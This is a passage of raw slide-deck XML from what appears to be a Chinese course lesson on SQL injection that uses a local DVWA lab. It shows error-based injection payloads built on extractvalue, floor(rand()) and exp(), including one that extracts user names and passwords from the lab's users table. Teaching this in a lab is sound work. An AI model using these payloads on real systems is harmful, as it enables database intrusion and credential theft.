              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pull </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>registry.cn-shanghai.aliyuncs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>yhskc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa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docker run -d -p 0.0.0.0:81:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>registry.cn-shanghai.aliyuncs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>yhskc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa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6F3BC2-2AD5-3846-901E-1677D6FD87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/>
              <a:t>DVWA</a:t>
            </a:r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764FFD-470B-4245-B320-921EF63F4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284" y="2232144"/>
            <a:ext cx="8108616" cy="392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0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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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FF3902F-C4F9-E84A-AE58-5D5E4F541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921" y="1451906"/>
            <a:ext cx="9705534" cy="350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08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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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BF5AB3A-1A7E-E646-B4C3-F2C4E4D16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12" y="3902110"/>
            <a:ext cx="11613776" cy="94558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5E29D7A-0F59-4A4A-9743-136159C22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050" y="1378952"/>
            <a:ext cx="52959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713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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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E189BB4-FBBE-FC44-A4B1-98F3C8E30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641" y="1800948"/>
            <a:ext cx="8768347" cy="247493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7B48D9C-55CE-6740-AAA2-276B69FE3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800" y="4741318"/>
            <a:ext cx="6018180" cy="126116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11B4725-8FD5-F74D-8FC0-0BED7442EE5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188800" y="929775"/>
            <a:ext cx="6281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http://127.0.0.1/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select @@version))) -- '&amp;Submit=Submit#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24843924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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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4196C6B-5F42-F74F-921A-F16E73685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202" y="4531603"/>
            <a:ext cx="5854700" cy="16129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51A23D6-A8E5-AF49-AD71-0DDA8EFC5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2491" y="1965010"/>
            <a:ext cx="7158121" cy="229700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D74ACBB-009C-754B-ADF8-7DB6012B7996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984987" y="1049096"/>
            <a:ext cx="76256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/>
              <a:t>http://127.0.0.1/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select user()),0x7e,(select database()))) -- '&amp;Submit=Submit#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42011962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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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4B72678-F7B7-4648-B0A8-6267EAE29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108911"/>
            <a:ext cx="8191500" cy="11811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6D3A911-51F5-1B4D-AD5E-AFD36EBFC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600" y="2495467"/>
            <a:ext cx="5537200" cy="6985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F3A345C-A440-EC40-887D-5F4B10C460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2600" y="5213601"/>
            <a:ext cx="4330700" cy="762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3D494C5-8A34-BF44-A088-40B5D1C39F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5450" y="3664034"/>
            <a:ext cx="83693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8235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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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511CA3-43C9-C94E-94CF-B23148302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600" y="1108800"/>
            <a:ext cx="8190000" cy="12133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F154068-BB4B-654D-B124-59BE62EEB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4000" y="2494800"/>
            <a:ext cx="4483100" cy="660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FECCA02-31E0-E340-8D13-B9B7E7447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1200" y="3628800"/>
            <a:ext cx="8370000" cy="120496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3CA38F9-CDAD-6249-BBEB-E2C387F406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4000" y="5212800"/>
            <a:ext cx="4330800" cy="47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82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BEBA81A-14FB-D54F-BA16-63ABCB5701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定义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原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335796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DAE252-181F-1447-A92D-4A6D1A17C5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/>
              <a:t>示例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6FD224F-2732-2843-A726-FA96AAAB6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798" y="2306440"/>
            <a:ext cx="8445500" cy="10287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68789DD-943C-5348-831A-015EFC56A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847" y="5209820"/>
            <a:ext cx="7010400" cy="7747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A1E92D0-FB09-1349-BE31-AC2BF55BE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798" y="3683035"/>
            <a:ext cx="8318500" cy="10668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372A3C90-B4E5-0E46-B94F-8D0347357E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1492500" y="1260830"/>
            <a:ext cx="86930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http://127.0.0.1/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select concat_ws(':',user,password)  from dvwa.users  limit 0,1))) -- '&amp;Submit=Submit#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="551162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E13A76-9049-494D-AC4A-9A32C765EE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/>
              <a:t>示例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8FFB3E-75FC-3441-BC48-3A1F46D77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52" y="3656853"/>
            <a:ext cx="11600329" cy="10291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5E308CD-F3FD-6D4C-9D3C-AC0C237B4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52" y="4913994"/>
            <a:ext cx="11901848" cy="8430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526A11F-BAC4-8840-872D-00459523D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0256" y="180000"/>
            <a:ext cx="6101682" cy="330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976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BE05BA-D419-5740-9E43-AE347EBF5D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/>
              <a:t>拓展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416EAFD-A382-364E-B6BE-8D02ECF0A570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607224" y="1921066"/>
            <a:ext cx="3446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u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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注入语句如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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:</a:t>
            </a:r>
            <a:endParaRPr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7D8723E1-FB05-2446-AE7E-FF009AA17C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607224" y="2486934"/>
            <a:ext cx="7620000" cy="6185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select 1 from (select count(*),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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concat</a:t>
            </a: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(user(),floor(rand(0)*2))x from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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information_schema.tables</a:t>
            </a:r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group by x)a;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B49514D-AE6C-4244-83A8-B2A4DD53A325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647329" y="3388917"/>
            <a:ext cx="3313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F3F3F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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注入语句如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F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:</a:t>
            </a:r>
            <a:endParaRPr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20CFEE6B-536B-184A-8815-0C285555E5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647329" y="3954785"/>
            <a:ext cx="7620000" cy="6185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select exp(~(select * from (select user())x));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2087324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54C6A-2360-E048-97AF-936385A0C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3414" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="x-none" sz="3200" dirty="0">
                <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>课后作业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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3BD0F8A-7223-6D4F-BDE2-67DD467D28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0" t="756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="5766697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62718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="579105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BE843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="21641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6990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349808" y="3726425"/>
            <a:ext cx="3100612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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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LET’S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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4F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5101888" y="3696667"/>
            <a:ext cx="68194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利用不同的函数进行报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="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sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4289880" y="3690518"/>
            <a:ext cx="406648" cy="406648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 519 w 719"/>
              <a:gd name="T1" fmla="*/ 263 h 719"/>
              <a:gd name="T2" fmla="*/ 292 w 719"/>
              <a:gd name="T3" fmla="*/ 475 h 719"/>
              <a:gd name="T4" fmla="*/ 289 w 719"/>
              <a:gd name="T5" fmla="*/ 477 h 719"/>
              <a:gd name="T6" fmla="*/ 284 w 719"/>
              <a:gd name="T7" fmla="*/ 479 h 719"/>
              <a:gd name="T8" fmla="*/ 280 w 719"/>
              <a:gd name="T9" fmla="*/ 477 h 719"/>
              <a:gd name="T10" fmla="*/ 275 w 719"/>
              <a:gd name="T11" fmla="*/ 475 h 719"/>
              <a:gd name="T12" fmla="*/ 200 w 719"/>
              <a:gd name="T13" fmla="*/ 400 h 719"/>
              <a:gd name="T14" fmla="*/ 198 w 719"/>
              <a:gd name="T15" fmla="*/ 396 h 719"/>
              <a:gd name="T16" fmla="*/ 197 w 719"/>
              <a:gd name="T17" fmla="*/ 391 h 719"/>
              <a:gd name="T18" fmla="*/ 198 w 719"/>
              <a:gd name="T19" fmla="*/ 387 h 719"/>
              <a:gd name="T20" fmla="*/ 200 w 719"/>
              <a:gd name="T21" fmla="*/ 382 h 719"/>
              <a:gd name="T22" fmla="*/ 205 w 719"/>
              <a:gd name="T23" fmla="*/ 380 h 719"/>
              <a:gd name="T24" fmla="*/ 209 w 719"/>
              <a:gd name="T25" fmla="*/ 379 h 719"/>
              <a:gd name="T26" fmla="*/ 213 w 719"/>
              <a:gd name="T27" fmla="*/ 380 h 719"/>
              <a:gd name="T28" fmla="*/ 217 w 719"/>
              <a:gd name="T29" fmla="*/ 382 h 719"/>
              <a:gd name="T30" fmla="*/ 284 w 719"/>
              <a:gd name="T31" fmla="*/ 450 h 719"/>
              <a:gd name="T32" fmla="*/ 503 w 719"/>
              <a:gd name="T33" fmla="*/ 247 h 719"/>
              <a:gd name="T34" fmla="*/ 507 w 719"/>
              <a:gd name="T35" fmla="*/ 243 h 719"/>
              <a:gd name="T36" fmla="*/ 512 w 719"/>
              <a:gd name="T37" fmla="*/ 243 h 719"/>
              <a:gd name="T38" fmla="*/ 516 w 719"/>
              <a:gd name="T39" fmla="*/ 243 h 719"/>
              <a:gd name="T40" fmla="*/ 519 w 719"/>
              <a:gd name="T41" fmla="*/ 247 h 719"/>
              <a:gd name="T42" fmla="*/ 522 w 719"/>
              <a:gd name="T43" fmla="*/ 251 h 719"/>
              <a:gd name="T44" fmla="*/ 523 w 719"/>
              <a:gd name="T45" fmla="*/ 255 h 719"/>
              <a:gd name="T46" fmla="*/ 522 w 719"/>
              <a:gd name="T47" fmla="*/ 260 h 719"/>
              <a:gd name="T48" fmla="*/ 519 w 719"/>
              <a:gd name="T49" fmla="*/ 263 h 719"/>
              <a:gd name="T50" fmla="*/ 707 w 719"/>
              <a:gd name="T51" fmla="*/ 0 h 719"/>
              <a:gd name="T52" fmla="*/ 12 w 719"/>
              <a:gd name="T53" fmla="*/ 0 h 719"/>
              <a:gd name="T54" fmla="*/ 8 w 719"/>
              <a:gd name="T55" fmla="*/ 2 h 719"/>
              <a:gd name="T56" fmla="*/ 4 w 719"/>
              <a:gd name="T57" fmla="*/ 5 h 719"/>
              <a:gd name="T58" fmla="*/ 1 w 719"/>
              <a:gd name="T59" fmla="*/ 8 h 719"/>
              <a:gd name="T60" fmla="*/ 0 w 719"/>
              <a:gd name="T61" fmla="*/ 13 h 719"/>
              <a:gd name="T62" fmla="*/ 0 w 719"/>
              <a:gd name="T63" fmla="*/ 707 h 719"/>
              <a:gd name="T64" fmla="*/ 1 w 719"/>
              <a:gd name="T65" fmla="*/ 713 h 719"/>
              <a:gd name="T66" fmla="*/ 4 w 719"/>
              <a:gd name="T67" fmla="*/ 716 h 719"/>
              <a:gd name="T68" fmla="*/ 8 w 719"/>
              <a:gd name="T69" fmla="*/ 719 h 719"/>
              <a:gd name="T70" fmla="*/ 12 w 719"/>
              <a:gd name="T71" fmla="*/ 719 h 719"/>
              <a:gd name="T72" fmla="*/ 707 w 719"/>
              <a:gd name="T73" fmla="*/ 719 h 719"/>
              <a:gd name="T74" fmla="*/ 711 w 719"/>
              <a:gd name="T75" fmla="*/ 719 h 719"/>
              <a:gd name="T76" fmla="*/ 716 w 719"/>
              <a:gd name="T77" fmla="*/ 716 h 719"/>
              <a:gd name="T78" fmla="*/ 718 w 719"/>
              <a:gd name="T79" fmla="*/ 713 h 719"/>
              <a:gd name="T80" fmla="*/ 719 w 719"/>
              <a:gd name="T81" fmla="*/ 707 h 719"/>
              <a:gd name="T82" fmla="*/ 719 w 719"/>
              <a:gd name="T83" fmla="*/ 13 h 719"/>
              <a:gd name="T84" fmla="*/ 718 w 719"/>
              <a:gd name="T85" fmla="*/ 8 h 719"/>
              <a:gd name="T86" fmla="*/ 716 w 719"/>
              <a:gd name="T87" fmla="*/ 5 h 719"/>
              <a:gd name="T88" fmla="*/ 711 w 719"/>
              <a:gd name="T89" fmla="*/ 2 h 719"/>
              <a:gd name="T90" fmla="*/ 707 w 719"/>
              <a:gd name="T91" fmla="*/ 0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19" h="719">
                <a:moveTo>
                  <a:pt x="519" y="263"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="263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4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4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80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81D485D-A2E7-4847-9F0D-F9DDC7B43516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1077123"/>
            <a:ext cx="3536212" cy="47037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78F8924F-8B41-6142-955D-1B0C6F6F4A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560042"/>
            <a:ext cx="2438767" cy="1742085"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="2540000" cy="1814399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1C690CBC-8273-D349-8157-7331D1E55C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670299"/>
              <a:ext cx="2540000" cy="408238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b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill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rPr>
                <a:t>堆叠注入</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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BC89281-EF38-C940-9341-B270697335B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="76835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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A731677F-9513-A24C-ACA0-117DF9B3D8E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490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83A41969-86DA-C543-A41D-D1E63FA59F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5664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo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600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68DB313F-F047-E446-9ABB-93D70609E1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8250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo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600"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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E08C75F-1B3A-3E4F-8D42-D1BA5E8FBE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="1588272"/>
            <a:ext cx="597104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定义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&amp;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原理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B4B1C2-1090-CC43-867A-DA4F1AB5C235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299685" y="1364005"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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4D9AD9-41AC-0342-95E1-88D45D9880DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278345" y="3046127"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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D2322A-ECEE-E446-8793-A2B1193347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="4950989"/>
            <a:ext cx="597104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实战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7D4893-1B52-DD40-A6AC-AB457A1F89BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299685" y="4726722"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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592BB7-8F23-574B-961F-6AEAB26B2E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="2280064"/>
            <a:ext cx="5971046" cy="1432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029ECB9-83CF-D443-B6E5-F388E0F2F301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
